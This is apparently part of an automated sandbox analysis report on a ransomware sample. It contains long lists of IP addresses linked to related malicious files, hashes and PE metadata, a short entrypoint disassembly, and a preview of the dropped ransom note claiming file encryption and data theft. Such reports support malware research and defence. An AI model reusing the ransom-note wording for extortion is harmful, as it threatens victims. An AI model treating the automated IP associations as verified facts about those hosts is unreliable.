                                                                                                                                                          A6Qom7We0l.exeGet hashmaliciousBrowse
                                                                                                                                                          • 85.234.145.174
                                                                                                                                                          • 185.2.4.64
                                                                                                                                                          • 136.243.147.81
                                                                                                                                                          • 52.29.252.113
                                                                                                                                                          • 184.168.131.241
                                                                                                                                                          • 155.133.142.13
                                                                                                                                                          • 142.93.110.250
                                                                                                                                                          • 89.46.91.28
                                                                                                                                                          • 87.230.41.243
                                                                                                                                                          • 159.69.118.212
                                                                                                                                                          • 85.119.82.125
                                                                                                                                                          • 116.90.53.15
                                                                                                                                                          • 188.165.53.185
                                                                                                                                                          • 178.250.15.192
                                                                                                                                                          • 74.220.215.94
                                                                                                                                                          • 94.16.115.81
                                                                                                                                                          • 91.121.58.131
                                                                                                                                                          • 185.107.227.241
                                                                                                                                                          • 198.12.145.239
                                                                                                                                                          • 46.30.215.215
                                                                                                                                                          • 91.195.240.117
                                                                                                                                                          • 172.67.222.33
                                                                                                                                                          • 79.137.75.185
                                                                                                                                                          • 83.166.155.153
                                                                                                                                                          • 35.221.46.9
                                                                                                                                                          • 77.72.5.145
                                                                                                                                                          • 151.139.128.10
                                                                                                                                                          • 104.26.13.9
                                                                                                                                                          • 185.98.131.150
                                                                                                                                                          • 104.21.9.188
                                                                                                                                                          • 166.62.110.232
                                                                                                                                                          • 104.21.78.13
                                                                                                                                                          • 91.201.60.54
                                                                                                                                                          • 144.76.225.204
                                                                                                                                                          • 66.155.35.240
                                                                                                                                                          • 184.175.106.113
                                                                                                                                                          BHuuI8LETf.exeGet hashmaliciousBrowse
                                                                                                                                                          • 85.234.145.174
                                                                                                                                                          • 185.2.4.64
                                                                                                                                                          • 136.243.147.81
                                                                                                                                                          • 52.29.252.113
                                                                                                                                                          • 184.168.131.241
                                                                                                                                                          • 155.133.142.13
                                                                                                                                                          • 142.93.110.250
                                                                                                                                                          • 89.46.91.28
                                                                                                                                                          • 87.230.41.243
                                                                                                                                                          • 159.69.118.212
                                                                                                                                                          • 85.119.82.125
                                                                                                                                                          • 116.90.53.15
                                                                                                                                                          • 188.165.53.185
                                                                                                                                                          • 178.250.15.192
                                                                                                                                                          • 74.220.215.94
                                                                                                                                                          • 94.16.115.81
                                                                                                                                                          • 91.121.58.131
                                                                                                                                                          • 185.107.227.241
                                                                                                                                                          • 198.12.145.239
                                                                                                                                                          • 46.30.215.215
                                                                                                                                                          • 91.195.240.117
                                                                                                                                                          • 172.67.222.33
                                                                                                                                                          • 79.137.75.185
                                                                                                                                                          • 83.166.155.153
                                                                                                                                                          • 35.221.46.9
                                                                                                                                                          • 77.72.5.145
                                                                                                                                                          • 151.139.128.10
                                                                                                                                                          • 104.26.13.9
                                                                                                                                                          • 185.98.131.150
                                                                                                                                                          • 104.21.9.188
                                                                                                                                                          • 166.62.110.232
                                                                                                                                                          • 104.21.78.13
                                                                                                                                                          • 91.201.60.54
                                                                                                                                                          • 144.76.225.204
                                                                                                                                                          • 66.155.35.240
                                                                                                                                                          • 184.175.106.113
                                                                                                                                                          m1hholPLan.exeGet hashmaliciousBrowse
                                                                                                                                                          • 85.234.145.174
                                                                                                                                                          • 185.2.4.64
                                                                                                                                                          • 136.243.147.81
                                                                                                                                                          • 52.29.252.113
                                                                                                                                                          • 184.168.131.241
                                                                                                                                                          • 155.133.142.13
                                                                                                                                                          • 142.93.110.250
                                                                                                                                                          • 89.46.91.28
                                                                                                                                                          • 87.230.41.243
                                                                                                                                                          • 159.69.118.212
                                                                                                                                                          • 85.119.82.125
                                                                                                                                                          • 116.90.53.15
                                                                                                                                                          • 188.165.53.185
                                                                                                                                                          • 178.250.15.192
                                                                                                                                                          • 74.220.215.94
                                                                                                                                                          • 94.16.115.81
                                                                                                                                                          • 91.121.58.131
                                                                                                                                                          • 185.107.227.241
                                                                                                                                                          • 198.12.145.239
                                                                                                                                                          • 46.30.215.215
                                                                                                                                                          • 91.195.240.117
                                                                                                                                                          • 172.67.222.33
                                                                                                                                                          • 79.137.75.185
                                                                                                                                                          • 83.166.155.153
                                                                                                                                                          • 35.221.46.9
                                                                                                                                                          • 77.72.5.145
                                                                                                                                                          • 151.139.128.10
                                                                                                                                                          • 104.26.13.9
                                                                                                                                                          • 185.98.131.150
                                                                                                                                                          • 104.21.9.188
                                                                                                                                                          • 166.62.110.232
                                                                                                                                                          • 104.21.78.13
                                                                                                                                                          • 91.201.60.54
                                                                                                                                                          • 144.76.225.204
                                                                                                                                                          • 66.155.35.240
                                                                                                                                                          • 184.175.106.113
                                                                                                                                                          nyDyMJGKWD.exeGet hashmaliciousBrowse
                                                                                                                                                          • 85.234.145.174
                                                                                                                                                          • 185.2.4.64
                                                                                                                                                          • 136.243.147.81
                                                                                                                                                          • 52.29.252.113
                                                                                                                                                          • 184.168.131.241
                                                                                                                                                          • 155.133.142.13
                                                                                                                                                          • 142.93.110.250
                                                                                                                                                          • 89.46.91.28
                                                                                                                                                          • 87.230.41.243
                                                                                                                                                          • 159.69.118.212
                                                                                                                                                          • 85.119.82.125
                                                                                                                                                          • 116.90.53.15
                                                                                                                                                          • 188.165.53.185
                                                                                                                                                          • 178.250.15.192
                                                                                                                                                          • 74.220.215.94
                                                                                                                                                          • 94.16.115.81
                                                                                                                                                          • 91.121.58.131
                                                                                                                                                          • 185.107.227.241
                                                                                                                                                          • 198.12.145.239
                                                                                                                                                          • 46.30.215.215
                                                                                                                                                          • 91.195.240.117
                                                                                                                                                          • 172.67.222.33
                                                                                                                                                          • 79.137.75.185
                                                                                                                                                          • 83.166.155.153
                                                                                                                                                          • 35.221.46.9
                                                                                                                                                          • 77.72.5.145
                                                                                                                                                          • 151.139.128.10
                                                                                                                                                          • 104.26.13.9
                                                                                                                                                          • 185.98.131.150
                                                                                                                                                          • 104.21.9.188
                                                                                                                                                          • 166.62.110.232
                                                                                                                                                          • 104.21.78.13
                                                                                                                                                          • 91.201.60.54
                                                                                                                                                          • 144.76.225.204
                                                                                                                                                          • 66.155.35.240
                                                                                                                                                          • 184.175.106.113
                                                                                                                                                          SecuriteInfo.com.Trojan.PWS.Siggen2.61222.12968.exeGet hashmaliciousBrowse
                                                                                                                                                          • 85.234.145.174
                                                                                                                                                          • 185.2.4.64
                                                                                                                                                          • 136.243.147.81
                                                                                                                                                          • 52.29.252.113
                                                                                                                                                          • 184.168.131.241
                                                                                                                                                          • 155.133.142.13
                                                                                                                                                          • 142.93.110.250
                                                                                                                                                          • 89.46.91.28
                                                                                                                                                          • 87.230.41.243
                                                                                                                                                          • 159.69.118.212
                                                                                                                                                          • 85.119.82.125
                                                                                                                                                          • 116.90.53.15
                                                                                                                                                          • 188.165.53.185
                                                                                                                                                          • 178.250.15.192
                                                                                                                                                          • 74.220.215.94
                                                                                                                                                          • 94.16.115.81
                                                                                                                                                          • 91.121.58.131
                                                                                                                                                          • 185.107.227.241
                                                                                                                                                          • 198.12.145.239
                                                                                                                                                          • 46.30.215.215
                                                                                                                                                          • 91.195.240.117
                                                                                                                                                          • 172.67.222.33
                                                                                                                                                          • 79.137.75.185
                                                                                                                                                          • 83.166.155.153
                                                                                                                                                          • 35.221.46.9
                                                                                                                                                          • 77.72.5.145
                                                                                                                                                          • 151.139.128.10
                                                                                                                                                          • 104.26.13.9
                                                                                                                                                          • 185.98.131.150
                                                                                                                                                          • 104.21.9.188
                                                                                                                                                          • 166.62.110.232
                                                                                                                                                          • 104.21.78.13
                                                                                                                                                          • 91.201.60.54
                                                                                                                                                          • 144.76.225.204
                                                                                                                                                          • 66.155.35.240
                                                                                                                                                          • 184.175.106.113
                                                                                                                                                          ZRz0Aq1Rf0.dllGet hashmaliciousBrowse
                                                                                                                                                          • 85.234.145.174
                                                                                                                                                          • 185.2.4.64
                                                                                                                                                          • 136.243.147.81
                                                                                                                                                          • 52.29.252.113
                                                                                                                                                          • 184.168.131.241
                                                                                                                                                          • 155.133.142.13
                                                                                                                                                          • 142.93.110.250
                                                                                                                                                          • 89.46.91.28
                                                                                                                                                          • 87.230.41.243
                                                                                                                                                          • 159.69.118.212
                                                                                                                                                          • 85.119.82.125
                                                                                                                                                          • 116.90.53.15
                                                                                                                                                          • 188.165.53.185
                                                                                                                                                          • 178.250.15.192
                                                                                                                                                          • 74.220.215.94
                                                                                                                                                          • 94.16.115.81
                                                                                                                                                          • 91.121.58.131
                                                                                                                                                          • 185.107.227.241
                                                                                                                                                          • 198.12.145.239
                                                                                                                                                          • 46.30.215.215
                                                                                                                                                          • 91.195.240.117
                                                                                                                                                          • 172.67.222.33
                                                                                                                                                          • 79.137.75.185
                                                                                                                                                          • 83.166.155.153
                                                                                                                                                          • 35.221.46.9
                                                                                                                                                          • 77.72.5.145
                                                                                                                                                          • 151.139.128.10
                                                                                                                                                          • 104.26.13.9
                                                                                                                                                          • 185.98.131.150
                                                                                                                                                          • 104.21.9.188
                                                                                                                                                          • 166.62.110.232
                                                                                                                                                          • 104.21.78.13
                                                                                                                                                          • 91.201.60.54
                                                                                                                                                          • 144.76.225.204
                                                                                                                                                          • 66.155.35.240
                                                                                                                                                          • 184.175.106.113
                                                                                                                                                          QpXze5wxqM.exeGet hashmaliciousBrowse
                                                                                                                                                          • 85.234.145.174
                                                                                                                                                          • 185.2.4.64
                                                                                                                                                          • 136.243.147.81
                                                                                                                                                          • 52.29.252.113
                                                                                                                                                          • 184.168.131.241
                                                                                                                                                          • 155.133.142.13
                                                                                                                                                          • 142.93.110.250
                                                                                                                                                          • 89.46.91.28
                                                                                                                                                          • 87.230.41.243
                                                                                                                                                          • 159.69.118.212
                                                                                                                                                          • 85.119.82.125
                                                                                                                                                          • 116.90.53.15
                                                                                                                                                          • 188.165.53.185
                                                                                                                                                          • 178.250.15.192
                                                                                                                                                          • 74.220.215.94
                                                                                                                                                          • 94.16.115.81
                                                                                                                                                          • 91.121.58.131
                                                                                                                                                          • 185.107.227.241
                                                                                                                                                          • 198.12.145.239
                                                                                                                                                          • 46.30.215.215
                                                                                                                                                          • 91.195.240.117
                                                                                                                                                          • 172.67.222.33
                                                                                                                                                          • 79.137.75.185
                                                                                                                                                          • 83.166.155.153
                                                                                                                                                          • 35.221.46.9
                                                                                                                                                          • 77.72.5.145
                                                                                                                                                          • 151.139.128.10
                                                                                                                                                          • 104.26.13.9
                                                                                                                                                          • 185.98.131.150
                                                                                                                                                          • 104.21.9.188
                                                                                                                                                          • 166.62.110.232
                                                                                                                                                          • 104.21.78.13
                                                                                                                                                          • 91.201.60.54
                                                                                                                                                          • 144.76.225.204
                                                                                                                                                          • 66.155.35.240
                                                                                                                                                          • 184.175.106.113
                                                                                                                                                          fmSEWxVZ1A.exeGet hashmaliciousBrowse
                                                                                                                                                          • 85.234.145.174
                                                                                                                                                          • 185.2.4.64
                                                                                                                                                          • 136.243.147.81
                                                                                                                                                          • 52.29.252.113
                                                                                                                                                          • 184.168.131.241
                                                                                                                                                          • 155.133.142.13
                                                                                                                                                          • 142.93.110.250
                                                                                                                                                          • 89.46.91.28
                                                                                                                                                          • 87.230.41.243
                                                                                                                                                          • 159.69.118.212
                                                                                                                                                          • 85.119.82.125
                                                                                                                                                          • 116.90.53.15
                                                                                                                                                          • 188.165.53.185
                                                                                                                                                          • 178.250.15.192
                                                                                                                                                          • 74.220.215.94
                                                                                                                                                          • 94.16.115.81
                                                                                                                                                          • 91.121.58.131
                                                                                                                                                          • 185.107.227.241
                                                                                                                                                          • 198.12.145.239
                                                                                                                                                          • 46.30.215.215
                                                                                                                                                          • 91.195.240.117
                                                                                                                                                          • 172.67.222.33
                                                                                                                                                          • 79.137.75.185
                                                                                                                                                          • 83.166.155.153
                                                                                                                                                          • 35.221.46.9
                                                                                                                                                          • 77.72.5.145
                                                                                                                                                          • 151.139.128.10
                                                                                                                                                          • 104.26.13.9
                                                                                                                                                          • 185.98.131.150
                                                                                                                                                          • 104.21.9.188
                                                                                                                                                          • 166.62.110.232
                                                                                                                                                          • 104.21.78.13
                                                                                                                                                          • 91.201.60.54
                                                                                                                                                          • 144.76.225.204
                                                                                                                                                          • 66.155.35.240
                                                                                                                                                          • 184.175.106.113
                                                                                                                                                          CeDOD6gY5R.exeGet hashmaliciousBrowse
                                                                                                                                                          • 85.234.145.174
                                                                                                                                                          • 185.2.4.64
                                                                                                                                                          • 136.243.147.81
                                                                                                                                                          • 52.29.252.113
                                                                                                                                                          • 184.168.131.241
                                                                                                                                                          • 155.133.142.13
                                                                                                                                                          • 142.93.110.250
                                                                                                                                                          • 89.46.91.28
                                                                                                                                                          • 87.230.41.243
                                                                                                                                                          • 159.69.118.212
                                                                                                                                                          • 85.119.82.125
                                                                                                                                                          • 116.90.53.15
                                                                                                                                                          • 188.165.53.185
                                                                                                                                                          • 178.250.15.192
                                                                                                                                                          • 74.220.215.94
                                                                                                                                                          • 94.16.115.81
                                                                                                                                                          • 91.121.58.131
                                                                                                                                                          • 185.107.227.241
                                                                                                                                                          • 198.12.145.239
                                                                                                                                                          • 46.30.215.215
                                                                                                                                                          • 91.195.240.117
                                                                                                                                                          • 172.67.222.33
                                                                                                                                                          • 79.137.75.185
                                                                                                                                                          • 83.166.155.153
                                                                                                                                                          • 35.221.46.9
                                                                                                                                                          • 77.72.5.145
                                                                                                                                                          • 151.139.128.10
                                                                                                                                                          • 104.26.13.9
                                                                                                                                                          • 185.98.131.150
                                                                                                                                                          • 104.21.9.188
                                                                                                                                                          • 166.62.110.232
                                                                                                                                                          • 104.21.78.13
                                                                                                                                                          • 91.201.60.54
                                                                                                                                                          • 144.76.225.204
                                                                                                                                                          • 66.155.35.240
                                                                                                                                                          • 184.175.106.113
                                                                                                                                                          HA2a7FagC6.exeGet hashmaliciousBrowse
                                                                                                                                                          • 85.234.145.174
                                                                                                                                                          • 185.2.4.64
                                                                                                                                                          • 136.243.147.81
                                                                                                                                                          • 52.29.252.113
                                                                                                                                                          • 184.168.131.241
                                                                                                                                                          • 155.133.142.13
                                                                                                                                                          • 142.93.110.250
                                                                                                                                                          • 89.46.91.28
                                                                                                                                                          • 87.230.41.243
                                                                                                                                                          • 159.69.118.212
                                                                                                                                                          • 85.119.82.125
                                                                                                                                                          • 116.90.53.15
                                                                                                                                                          • 188.165.53.185
                                                                                                                                                          • 178.250.15.192
                                                                                                                                                          • 74.220.215.94
                                                                                                                                                          • 94.16.115.81
                                                                                                                                                          • 91.121.58.131
                                                                                                                                                          • 185.107.227.241
                                                                                                                                                          • 198.12.145.239
                                                                                                                                                          • 46.30.215.215
                                                                                                                                                          • 91.195.240.117
                                                                                                                                                          • 172.67.222.33
                                                                                                                                                          • 79.137.75.185
                                                                                                                                                          • 83.166.155.153
                                                                                                                                                          • 35.221.46.9
                                                                                                                                                          • 77.72.5.145
                                                                                                                                                          • 151.139.128.10
                                                                                                                                                          • 104.26.13.9
                                                                                                                                                          • 185.98.131.150
                                                                                                                                                          • 104.21.9.188
                                                                                                                                                          • 166.62.110.232
                                                                                                                                                          • 104.21.78.13
                                                                                                                                                          • 91.201.60.54
                                                                                                                                                          • 144.76.225.204
                                                                                                                                                          • 66.155.35.240
                                                                                                                                                          • 184.175.106.113
                                                                                                                                                          MakYpSHZKE.exeGet hashmaliciousBrowse
                                                                                                                                                          • 85.234.145.174
                                                                                                                                                          • 185.2.4.64
                                                                                                                                                          • 136.243.147.81
                                                                                                                                                          • 52.29.252.113
                                                                                                                                                          • 184.168.131.241
                                                                                                                                                          • 155.133.142.13
                                                                                                                                                          • 142.93.110.250
                                                                                                                                                          • 89.46.91.28
                                                                                                                                                          • 87.230.41.243
                                                                                                                                                          • 159.69.118.212
                                                                                                                                                          • 85.119.82.125
                                                                                                                                                          • 116.90.53.15
                                                                                                                                                          • 188.165.53.185
                                                                                                                                                          • 178.250.15.192
                                                                                                                                                          • 74.220.215.94
                                                                                                                                                          • 94.16.115.81
                                                                                                                                                          • 91.121.58.131
                                                                                                                                                          • 185.107.227.241
                                                                                                                                                          • 198.12.145.239
                                                                                                                                                          • 46.30.215.215
                                                                                                                                                          • 91.195.240.117
                                                                                                                                                          • 172.67.222.33
                                                                                                                                                          • 79.137.75.185
                                                                                                                                                          • 83.166.155.153
                                                                                                                                                          • 35.221.46.9
                                                                                                                                                          • 77.72.5.145
                                                                                                                                                          • 151.139.128.10
                                                                                                                                                          • 104.26.13.9
                                                                                                                                                          • 185.98.131.150
                                                                                                                                                          • 104.21.9.188
                                                                                                                                                          • 166.62.110.232
                                                                                                                                                          • 104.21.78.13
                                                                                                                                                          • 91.201.60.54
                                                                                                                                                          • 144.76.225.204
                                                                                                                                                          • 66.155.35.240
                                                                                                                                                          • 184.175.106.113
                                                                                                                                                          lGJz5igIpb.exeGet hashmaliciousBrowse
                                                                                                                                                          • 85.234.145.174
                                                                                                                                                          • 185.2.4.64
                                                                                                                                                          • 136.243.147.81
                                                                                                                                                          • 52.29.252.113
                                                                                                                                                          • 184.168.131.241
                                                                                                                                                          • 155.133.142.13
                                                                                                                                                          • 142.93.110.250
                                                                                                                                                          • 89.46.91.28
                                                                                                                                                          • 87.230.41.243
                                                                                                                                                          • 159.69.118.212
                                                                                                                                                          • 85.119.82.125
                                                                                                                                                          • 116.90.53.15
                                                                                                                                                          • 188.165.53.185
                                                                                                                                                          • 178.250.15.192
                                                                                                                                                          • 74.220.215.94
                                                                                                                                                          • 94.16.115.81
                                                                                                                                                          • 91.121.58.131
                                                                                                                                                          • 185.107.227.241
                                                                                                                                                          • 198.12.145.239
                                                                                                                                                          • 46.30.215.215
                                                                                                                                                          • 91.195.240.117
                                                                                                                                                          • 172.67.222.33
                                                                                                                                                          • 79.137.75.185
                                                                                                                                                          • 83.166.155.153
                                                                                                                                                          • 35.221.46.9
                                                                                                                                                          • 77.72.5.145
                                                                                                                                                          • 151.139.128.10
                                                                                                                                                          • 104.26.13.9
                                                                                                                                                          • 185.98.131.150
                                                                                                                                                          • 104.21.9.188
                                                                                                                                                          • 166.62.110.232
                                                                                                                                                          • 104.21.78.13
                                                                                                                                                          • 91.201.60.54
                                                                                                                                                          • 144.76.225.204
                                                                                                                                                          • 66.155.35.240
                                                                                                                                                          • 184.175.106.113

                                                                                                                                                          Dropped Files

                                                                                                                                                          No context

                                                                                                                                                          Created / dropped Files

                                                                                                                                                          C:\4wfaj7427w-readme.txt
                                                                                                                                                          Process:C:\Users\user\Desktop\tS9P6wPz9x.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8140
                                                                                                                                                          Entropy (8bit):3.837132745420337
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:sL65De+s3jFmMlQKyuwhKWbQPGN9IhR9Pgd3o1DW:/e+iFmpRxIluHw9Pg7
                                                                                                                                                          MD5:53F6DD24C66DC8D19F9D0DAD02FAD9C9
                                                                                                                                                          SHA1:141442ACE97CE7DA64C34C52B0AAB131B3B22150
                                                                                                                                                          SHA-256:3C23E9EACD000A992CD2237CD1BC5550170DE8E8B7C8DC403A7527E554210B23
                                                                                                                                                          SHA-512:3CDBD1B246EAFF84BE51D15C2B367B7366B12D589D58E1C5928B11B41D8C3927ACE566A5662C9DB7D312D0E90660DAF66C1B35E46EB6A829A3F8910E72F0A816
                                                                                                                                                          Malicious:true
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview: -.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u.r. .s.y.s.t.e.m. .h.a.s. .e.x.t.e.n.s.i.o.n. .4.w.f.a.j.7.4.2.7.w.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .D.a.t.a. .l.e.a.k. .[.+.].........F.i.r.s.t. .o.f. .a.l.l. .w.e. .h.a.v.e. .u.p.l.o.a.d.e.d. .m.o.r.e. .t.h.e.n. .8.0. .G.B. .a.r.c.h.i.v.e.d. .d.a.t.a. .f.r.o.m. .\.\.U.D.A.T.A...........E.x.a.m.p.l.e. .o.f. .d.a.t.a.:.....-. .A.c.c.o.u.n.t.i.n.g.....-. .F.i.n.a.n.c.e.
                                                                                                                                                          C:\bootTel.dat
                                                                                                                                                          Process:C:\Users\user\Desktop\tS9P6wPz9x.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):312
                                                                                                                                                          Entropy (8bit):7.333568715579559
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:ao3c9W/A+TStdKXqVcVit8iGYmaJ9fIGW7plXZ+LuPBoCF:aoA+9XqKVitNmmMplQa
                                                                                                                                                          MD5:700F1CDC1C2BC0EC2B71B3EEEF90D939
                                                                                                                                                          SHA1:D57440CF23F627B24367B9351E28BE72C7677299
                                                                                                                                                          SHA-256:6CF33DE5A44A3639C84A65E2B3A3AA4D8AE4896AD551874046B25AAE7500D49F
                                                                                                                                                          SHA-512:BDCCC48FC2CCD17010FDE795149783DD3B648101A1F544D7FDF1A07728346FBD7632B5347D8A03E5FD85FBBFA75603D1C425D012D2AB1F67A2169901C94E8242
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview: ...HWx2_..Y.R..7?....l.l.f.l.PXn......1.Q.l.;.........%.GZ..D.4......vc..M...vL...N.....8.....L.S..6..b.&....:./.Q..u1...8@..t_.Z.....$5=.6...8i..a..`xP~p.q..c...xx-.\~.e.AO.6...6.=6n....Q......J.....I.....C39...._...D&.....r.....q.P.F...\..;o. .V=1...[..u..K....c..q=...s..E.c.6......w.........vn+.

                                                                                                                                                          Static File Info

                                                                                                                                                          General

                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Entropy (8bit):6.677816193182115
                                                                                                                                                          TrID:
                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                          File name:tS9P6wPz9x.exe
                                                                                                                                                          File size:120832
                                                                                                                                                          MD5:39d22b8f3da4a83cd957f324f2423309
                                                                                                                                                          SHA1:70baae39f80e8917a71353110bb85e797e23524a
                                                                                                                                                          SHA256:c8c169ad2628ff3860c4d0bd04afeb81262051f664f9d5a334c32c78e791a7f8
                                                                                                                                                          SHA512:293ac35141e885e685b7ba588fea2ba84ece78441dea9c9b3e28d584923dc9ab0605016244d3f95dec56e49c701a9e19d006e8d5d3604a3423ed167b236a7ecd
                                                                                                                                                          SSDEEP:1536:pRGfmACfvCHeQ5EJRDKiMIfB6Ym5p/eyxICS4AxpoC3/0b2zAmQF6rkyM3/Z:omRj6YaWm8/0b49QIM3
                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:...[.[.[.[.[.[...Z.[.[...Z.[.[...Z.[.[\..[.[.[\..[.[.[.[.[.[.[\..[.[.[...Z.[.[...Z.[.[Rich.[.[................PE..L...1g._...

                                                                                                                                                          File Icon

                                                                                                                                                          Icon Hash:00828e8e8686b000

                                                                                                                                                          Static PE Info

                                                                                                                                                          General

                                                                                                                                                          Entrypoint:0x404274
                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                          Digitally signed:false
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE
                                                                                                                                                          Time Stamp:0x5FFC6731 [Mon Jan 11 14:56:49 2021 UTC]
                                                                                                                                                          TLS Callbacks:
                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                          OS Version Major:5
                                                                                                                                                          OS Version Minor:1
                                                                                                                                                          File Version Major:5
                                                                                                                                                          File Version Minor:1
                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                          Subsystem Version Minor:1
                                                                                                                                                          Import Hash:63fe86338b92e2aba319c5d54ac4e1c7

                                                                                                                                                          Entrypoint Preview

                                                                                                                                                          Instruction
                                                                                                                                                          push 00000000h
                                                                                                                                                          call 00007F056473BB5Fh
                                                                                                                                                          push 00000000h
                                                                                                                                                          call 00007F056473C52Dh
                                                                                                                                                          pop ecx
                                                                                                                                                          ret
                                                                                                                                                          push ebp
                                                                                                                                                          mov ebp, esp
                                                                                                                                                          sub esp, 2Ch
                                                                                                                                                          lea eax, dword ptr [ebp-2Ch]
                                                                                                                                                          push esi
                                                                                                                                                          push eax
                                                                                                                                                          push 00000018h
                                                                                                                                                          pop esi
                                                                                                                                                          push esi
                                                                                                                                                          push dword ptr [ebp+08h]
                                                                                                                                                          call dword ptr [00411194h]
                                                                                                                                                          test eax, eax
                                                                                                                                                          je 00007F056473BD86h
                                                                                                                                                          mov eax, dword ptr [ebp-1Ah]
                                                                                                                                                          imul eax, dword ptr [ebp-1Ch]
                                                                                                                                                          push ebx
                                                                                                                                                          push edi
                                                                                                                                                          xor edi, edi
                                                                                                                                                          inc edi
                                                                                                                                                          movzx eax, ax
                                                                                                                                                          cmp ax, di
                                                                                                                                                          jne 00007F056473BBF6h
                                                                                                                                                          mov ebx, edi
                                                                                                                                                          jmp 00007F056473BC18h
                                                                                                                                                          push 00000004h
                                                                                                                                                          pop ebx
                                                                                                                                                          cmp ax, bx
                                                                                                                                                          jbe 00007F056473BC10h
                                                                                                                                                          push 00000008h
                                                                                                                                                          pop ebx
                                                                                                                                                          cmp ax, bx
                                                                                                                                                          jbe 00007F056473BC08h
                                                                                                                                                          push 00000010h
                                                                                                                                                          pop ebx
                                                                                                                                                          cmp ax, bx
                                                                                                                                                          jbe 00007F056473BC00h
                                                                                                                                                          cmp ax, si
                                                                                                                                                          jnbe 00007F056473BBF8h
                                                                                                                                                          mov ebx, esi
                                                                                                                                                          push 00000028h
                                                                                                                                                          jmp 00007F056473BC03h
                                                                                                                                                          push 00000020h
                                                                                                                                                          pop ebx
                                                                                                                                                          mov eax, edi
                                                                                                                                                          mov cl, bl
                                                                                                                                                          shl eax, cl
                                                                                                                                                          lea eax, dword ptr [00000028h+eax*4]
                                                                                                                                                          push eax
                                                                                                                                                          push 00000040h
                                                                                                                                                          call dword ptr [00411150h]
                                                                                                                                                          mov esi, eax
                                                                                                                                                          push 00000018h
                                                                                                                                                          mov dword ptr [esi], 00000028h
                                                                                                                                                          mov eax, dword ptr [ebp-28h]
                                                                                                                                                          mov dword ptr [esi+04h], eax
                                                                                                                                                          mov eax, dword ptr [ebp-24h]
                                                                                                                                                          mov dword ptr [esi+08h], eax
                                                                                                                                                          mov ax, word ptr [ebp-1Ch]
                                                                                                                                                          mov word ptr [esi+0Ch], ax
                                                                                                                                                          mov ax, word ptr [ebp-1Ah]
                                                                                                                                                          mov word ptr [esi+0Eh], ax
                                                                                                                                                          pop eax
                                                                                                                                                          cmp bx, ax
                                                                                                                                                          jnc 00007F056473BBF9h
                                                                                                                                                          mov cl, bl
                                                                                                                                                          shl edi, cl
                                                                                                                                                          mov dword ptr [esi+20h], edi
                                                                                                                                                          mov eax, dword ptr [esi+04h]
                                                                                                                                                          xor edi, edi
                                                                                                                                                          add eax, 07h
                                                                                                                                                          movzx ecx, bx
                                                                                                                                                          cdq
                                                                                                                                                          and edx, 07h
                                                                                                                                                          mov dword ptr [esi+00h], edi

                                                                                                                                                          Rich Headers

                                                                                                                                                          Programming Language:
                                                                                                                                                          • [LNK] VS2015 UPD3.1 build 24215
                                                                                                                                                          • [ C ] VS2015 UPD3.1 build 24215

                                                                                                                                                          Data Directories

                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xfc100x50.rdata
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x200000x6e4.reloc
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0xd0000x48.rdata
